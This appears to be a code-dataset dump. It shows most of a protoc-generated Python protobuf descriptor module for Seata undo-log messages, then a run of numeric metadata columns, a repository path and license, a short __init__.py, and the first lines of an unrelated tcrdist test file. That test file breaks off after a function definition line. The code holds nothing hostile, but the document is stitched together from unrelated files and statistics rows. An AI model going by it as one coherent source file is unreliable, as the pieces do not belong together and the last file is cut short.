number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=247,
serialized_end=446,
)
_TABLERECORDS = _descriptor.Descriptor(
name='TableRecords',
full_name='seata.rm.datasource.undo.parser.proto.TableRecords',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_meta', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.table_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.table_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rows', full_name='seata.rm.datasource.undo.parser.proto.TableRecords.rows', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=449,
serialized_end=611,
)
_TABLEMETA_ALLCOLUMNSENTRY = _descriptor.Descriptor(
name='AllColumnsEntry',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=819,
serialized_end=919,
)
_TABLEMETA_ALLINDEXSENTRY = _descriptor.Descriptor(
name='AllIndexsEntry',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=921,
serialized_end=1019,
)
_TABLEMETA = _descriptor.Descriptor(
name='TableMeta',
full_name='seata.rm.datasource.undo.parser.proto.TableMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.table_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='all_columns', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.all_columns', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='all_indexs', full_name='seata.rm.datasource.undo.parser.proto.TableMeta.all_indexs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TABLEMETA_ALLCOLUMNSENTRY, _TABLEMETA_ALLINDEXSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=614,
serialized_end=1019,
)
_COLUMNMETA = _descriptor.Descriptor(
name='ColumnMeta',
full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='table_cat', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_cat', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_schema_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_schema_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='table_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.table_name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data_type', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.data_type', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data_type_name', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.data_type_name', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_size', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_size', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='decimal_digits', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.decimal_digits', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_prec_radix', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.num_prec_radix', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='null_able', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.null_able', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='remarks', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.remarks', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='column_def', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.column_def', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_data_type', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.sql_data_type', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sql_datetime_sub', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.sql_datetime_sub', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='char_octet_length', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.char_octet_length', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ordinal_position', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.ordinal_position', index=15,
number=16, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_nullable', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.is_nullable', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_autoincrement', full_name='seata.rm.datasource.undo.parser.proto.ColumnMeta.is_autoincrement', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1022,
serialized_end=1460,
)
# --- protoc-generated descriptor: do not edit by hand; edit the .proto source. ---
# Descriptor for the IndexMeta message
# (full name: seata.rm.datasource.undo.parser.proto.IndexMeta).
# message_type links for message-valued fields are left as None here and are
# resolved later in this file (e.g. 'values' is pointed at _COLUMNMETA).
_INDEXMETA = _descriptor.Descriptor(
  name='IndexMeta',
  full_name='seata.rm.datasource.undo.parser.proto.IndexMeta',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # values: repeated message field (field number 1).
    _descriptor.FieldDescriptor(
      name='values', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.values', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # non_unique: bool field (field number 2).
    _descriptor.FieldDescriptor(
      name='non_unique', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.non_unique', index=1,
      number=2, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # index_qualifier: string field (field number 3).
    _descriptor.FieldDescriptor(
      name='index_qualifier', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_qualifier', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # index_name: string field (field number 4).
    _descriptor.FieldDescriptor(
      name='index_name', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_name', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # type: int32 field (field number 5).
    _descriptor.FieldDescriptor(
      name='type', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.type', index=4,
      number=5, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # index_type: int32 field (field number 6).
    _descriptor.FieldDescriptor(
      name='index_type', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.index_type', index=5,
      number=6, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # asc_or_desc: string field (field number 7).
    _descriptor.FieldDescriptor(
      name='asc_or_desc', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.asc_or_desc', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # cardinality: int32 field (field number 8).
    _descriptor.FieldDescriptor(
      name='cardinality', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.cardinality', index=7,
      number=8, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # ordinal_position: int32 field (field number 9).
    _descriptor.FieldDescriptor(
      name='ordinal_position', full_name='seata.rm.datasource.undo.parser.proto.IndexMeta.ordinal_position', index=8,
      number=9, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message inside the serialized FileDescriptorProto.
  serialized_start=1463,
  serialized_end=1708,
)
# --- protoc-generated descriptor: do not edit by hand; edit the .proto source. ---
# Descriptor for the Row message: a single repeated message field 'fields'
# (resolved to _FIELD later in this file).
_ROW = _descriptor.Descriptor(
  name='Row',
  full_name='seata.rm.datasource.undo.parser.proto.Row',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # fields: repeated message field (field number 1).
    _descriptor.FieldDescriptor(
      name='fields', full_name='seata.rm.datasource.undo.parser.proto.Row.fields', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message inside the serialized FileDescriptorProto.
  serialized_start=1710,
  serialized_end=1777,
)
# --- protoc-generated descriptor: do not edit by hand; edit the .proto source. ---
# Descriptor for the Field message: one column value of a row
# (name, key_type, type, value).
_FIELD = _descriptor.Descriptor(
  name='Field',
  full_name='seata.rm.datasource.undo.parser.proto.Field',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    # name: string field (field number 1).
    _descriptor.FieldDescriptor(
      name='name', full_name='seata.rm.datasource.undo.parser.proto.Field.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # key_type: int32 field (field number 2).
    _descriptor.FieldDescriptor(
      name='key_type', full_name='seata.rm.datasource.undo.parser.proto.Field.key_type', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # type: int32 field (field number 3).
    _descriptor.FieldDescriptor(
      name='type', full_name='seata.rm.datasource.undo.parser.proto.Field.type', index=2,
      number=3, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    # value: string field (field number 4).
    _descriptor.FieldDescriptor(
      name='value', full_name='seata.rm.datasource.undo.parser.proto.Field.value', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message inside the serialized FileDescriptorProto.
  serialized_start=1779,
  serialized_end=1847,
)
# --- protoc-generated wiring: do not edit by hand; edit the .proto source. ---
# Resolve the message-type cross references that could not be filled in while
# the descriptors above were being constructed.
_BRANCHUNDOLOG.fields_by_name['sql_undo_logs'].message_type = _SQLUNDOLOG
# 'xid' and 'branch_id' each live inside a single-member oneof
# ('_xid' / '_branch_id'); wire field and oneof to each other both ways.
_BRANCHUNDOLOG.oneofs_by_name['_xid'].fields.append(
  _BRANCHUNDOLOG.fields_by_name['xid'])
_BRANCHUNDOLOG.fields_by_name['xid'].containing_oneof = _BRANCHUNDOLOG.oneofs_by_name['_xid']
_BRANCHUNDOLOG.oneofs_by_name['_branch_id'].fields.append(
  _BRANCHUNDOLOG.fields_by_name['branch_id'])
_BRANCHUNDOLOG.fields_by_name['branch_id'].containing_oneof = _BRANCHUNDOLOG.oneofs_by_name['_branch_id']
_SQLUNDOLOG.fields_by_name['before_image'].message_type = _TABLERECORDS
_SQLUNDOLOG.fields_by_name['after_image'].message_type = _TABLERECORDS
_TABLERECORDS.fields_by_name['table_meta'].message_type = _TABLEMETA
_TABLERECORDS.fields_by_name['rows'].message_type = _ROW
# TableMeta's map fields are modelled as nested *Entry messages; hook up
# their value types and containing type.
_TABLEMETA_ALLCOLUMNSENTRY.fields_by_name['value'].message_type = _COLUMNMETA
_TABLEMETA_ALLCOLUMNSENTRY.containing_type = _TABLEMETA
_TABLEMETA_ALLINDEXSENTRY.fields_by_name['value'].message_type = _INDEXMETA
_TABLEMETA_ALLINDEXSENTRY.containing_type = _TABLEMETA
_TABLEMETA.fields_by_name['all_columns'].message_type = _TABLEMETA_ALLCOLUMNSENTRY
_TABLEMETA.fields_by_name['all_indexs'].message_type = _TABLEMETA_ALLINDEXSENTRY
# char_octet_length is a google.protobuf.Any field.
_COLUMNMETA.fields_by_name['char_octet_length'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_INDEXMETA.fields_by_name['values'].message_type = _COLUMNMETA
_ROW.fields_by_name['fields'].message_type = _FIELD
# Publish every top-level message type on the file descriptor, then register
# the file with the default symbol database.
DESCRIPTOR.message_types_by_name['BranchUndoLog'] = _BRANCHUNDOLOG
DESCRIPTOR.message_types_by_name['SQLUndoLog'] = _SQLUNDOLOG
DESCRIPTOR.message_types_by_name['TableRecords'] = _TABLERECORDS
DESCRIPTOR.message_types_by_name['TableMeta'] = _TABLEMETA
DESCRIPTOR.message_types_by_name['ColumnMeta'] = _COLUMNMETA
DESCRIPTOR.message_types_by_name['IndexMeta'] = _INDEXMETA
DESCRIPTOR.message_types_by_name['Row'] = _ROW
DESCRIPTOR.message_types_by_name['Field'] = _FIELD
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete Python message classes from the descriptors via the
# reflection machinery, and register each class with the symbol database.
BranchUndoLog = _reflection.GeneratedProtocolMessageType('BranchUndoLog', (_message.Message,), {
  'DESCRIPTOR' : _BRANCHUNDOLOG,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.BranchUndoLog)
  })
_sym_db.RegisterMessage(BranchUndoLog)
SQLUndoLog = _reflection.GeneratedProtocolMessageType('SQLUndoLog', (_message.Message,), {
  'DESCRIPTOR' : _SQLUNDOLOG,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.SQLUndoLog)
  })
_sym_db.RegisterMessage(SQLUndoLog)
TableRecords = _reflection.GeneratedProtocolMessageType('TableRecords', (_message.Message,), {
  'DESCRIPTOR' : _TABLERECORDS,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableRecords)
  })
_sym_db.RegisterMessage(TableRecords)
# TableMeta carries its two map-entry classes as nested types.
TableMeta = _reflection.GeneratedProtocolMessageType('TableMeta', (_message.Message,), {
  'AllColumnsEntry' : _reflection.GeneratedProtocolMessageType('AllColumnsEntry', (_message.Message,), {
    'DESCRIPTOR' : _TABLEMETA_ALLCOLUMNSENTRY,
    '__module__' : 'branch_undolog_pb2'
    # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta.AllColumnsEntry)
    })
  ,
  'AllIndexsEntry' : _reflection.GeneratedProtocolMessageType('AllIndexsEntry', (_message.Message,), {
    'DESCRIPTOR' : _TABLEMETA_ALLINDEXSENTRY,
    '__module__' : 'branch_undolog_pb2'
    # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta.AllIndexsEntry)
    })
  ,
  'DESCRIPTOR' : _TABLEMETA,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.TableMeta)
  })
_sym_db.RegisterMessage(TableMeta)
_sym_db.RegisterMessage(TableMeta.AllColumnsEntry)
_sym_db.RegisterMessage(TableMeta.AllIndexsEntry)
ColumnMeta = _reflection.GeneratedProtocolMessageType('ColumnMeta', (_message.Message,), {
  'DESCRIPTOR' : _COLUMNMETA,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.ColumnMeta)
  })
_sym_db.RegisterMessage(ColumnMeta)
IndexMeta = _reflection.GeneratedProtocolMessageType('IndexMeta', (_message.Message,), {
  'DESCRIPTOR' : _INDEXMETA,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.IndexMeta)
  })
_sym_db.RegisterMessage(IndexMeta)
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), {
  'DESCRIPTOR' : _ROW,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.Row)
  })
_sym_db.RegisterMessage(Row)
Field = _reflection.GeneratedProtocolMessageType('Field', (_message.Message,), {
  'DESCRIPTOR' : _FIELD,
  '__module__' : 'branch_undolog_pb2'
  # @@protoc_insertion_point(class_scope:seata.rm.datasource.undo.parser.proto.Field)
  })
_sym_db.RegisterMessage(Field)
# Clear any serialized options on the synthesized map-entry descriptors.
_TABLEMETA_ALLCOLUMNSENTRY._options = None
_TABLEMETA_ALLINDEXSENTRY._options = None
# @@protoc_insertion_point(module_scope)
| 49.09375
| 3,125
| 0.758171
| 4,824
| 36,133
| 5.368988
| 0.060116
| 0.049112
| 0.074093
| 0.068108
| 0.801544
| 0.773436
| 0.752471
| 0.741583
| 0.737876
| 0.690386
| 0
| 0.035608
| 0.114743
| 36,133
| 735
| 3,126
| 49.160544
| 0.774096
| 0.030526
| 0
| 0.69163
| 1
| 0.001468
| 0.234504
| 0.188803
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007342
| 0
| 0.007342
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6c42c2c0a7288c83cc99bb0c3154a109fa8ad3e5
| 128
|
py
|
Python
|
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
figpptx/converters/__init__.py
|
Sillte/figpptx
|
bf5539b09eeef4e6a17bb4483f62f29d286138b2
|
[
"MIT"
] | null | null | null |
""" You have to clarify import here.
"""
from . import line2d # NOQA
from . import fancybox # NOQA
from . import text # NOQA
| 21.333333
| 36
| 0.671875
| 18
| 128
| 4.777778
| 0.611111
| 0.348837
| 0.325581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010101
| 0.226563
| 128
| 5
| 37
| 25.6
| 0.858586
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
66b04af9bd9204478a87cb60ecd32f64c786676b
| 23,340
|
py
|
Python
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 14
|
2019-07-16T22:49:20.000Z
|
2022-02-03T00:05:38.000Z
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 20
|
2019-08-02T14:47:20.000Z
|
2020-06-29T15:09:18.000Z
|
tcrdist/tests/test_reverse_translate.py
|
agartland/tcrdist2
|
77ab0036a3f8f3951093a3bb14741d961ae14eda
|
[
"MIT"
] | 5
|
2019-06-07T21:04:54.000Z
|
2021-04-15T04:28:00.000Z
|
import pytest
from tcrdist.reverse_translate import TCRcodon
from tcrdist.tests.my_test_subset import clone_df_subset
import numpy as np
import pandas as pd
def test_TCRcodon_mouse_ab_init():
